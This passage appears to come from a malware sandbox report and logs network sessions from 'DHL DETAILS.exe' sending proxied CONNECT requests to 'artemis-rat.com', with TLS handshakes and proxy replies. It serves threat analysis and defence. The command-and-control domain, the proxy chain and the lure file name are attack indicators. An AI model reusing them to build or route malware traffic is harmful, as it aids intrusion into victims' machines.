Mar 9, 2024 13:14:12.937105894 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 93 fb af 0b e8 1a e5 75 ba bc a6 fe 20 cf 82 bb 80 67 c5 c8 3a a4 f4 ab 0f c1 a1 77 72 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRu g:wr*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:13.203269005 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 c8 be af 09 9e 23 71 8a 94 35 12 27 0a 92 85 13 3c 1a db 37 ac ea b3 47 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9#q5'<7GDOWNGRD0000H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0H0LU,m-YLa
Mar 9, 2024 13:14:13.204936028 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 1a a4 19 b5 9c 5b 64 ae 9b ce c2 91 23 b1 1a 73 26 49 b1 d7 1d a1 67 ab 67 15 02 a9 85 68 8f 77 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 e5 eb 43 a7 2f e5 99 51 2b 43 95 8b be 81 02 c9 09 c1 12 42 1f Data Ascii: %! [d#s&Igghw(C/Q+CBUWcVn
Mar 9, 2024 13:14:13.465270996 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 91 e0 5b 13 c9 8e 6e e1 76 b3 56 a6 b0 11 09 d0 d9 2a 68 0f f2 d3 39 13 e1 f3 7b 71 77 62 5e 3c 98 37 12 90 f6 9b 46 69 Data Ascii: ([nvV*h9{qwb^<7Fi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	50046	103.163.51.254	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.680258989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.086532116 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	50019	102.132.201.202	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.680629969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.155966997 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	50263	142.4.123.41	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.682044983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.5	50401	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.686203003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.5	50062	13.234.24.116	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.687047958 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.565371990 CET	65	IN	HTTP/1.1 200 Connection Established Content-Type: text/plain

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.5	50412	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.687818050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.5	50416	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.689342976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.5	50421	36.94.2.138	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.690769911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.5	50253	74.208.12.35	37339	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.693376064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.192447901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.786253929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.958149910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.380155087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.780262947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.177025080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.880100012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.177902937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.5	50088	119.3.215.41	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.693680048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.5	50111	134.209.105.209	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.695553064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.037281036 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.5	50294	104.25.115.125	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.695882082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.849936008 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.5	50150	5.135.83.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.697577953 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.002902985 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.5	50305	172.67.182.150	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.702141047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.856511116 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.5	50319	104.24.136.68	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.723526001 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.877782106 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	50333	185.162.229.127	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.726136923 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.880336046 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	50468	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.737385035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	50352	185.238.228.240	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.740739107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.895232916 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	50109	65.1.40.47	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.741395950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.131427050 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:12 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	50476	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.741940022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	50484	93.190.24.119	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.744607925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	50485	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.744792938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	50140	222.223.103.232	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.745968103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.103601933 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	50486	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.746510983 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	50488	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.749583006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	50365	172.67.36.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:12.751393080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.905917883 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:12 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	50493	43.157.44.79	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
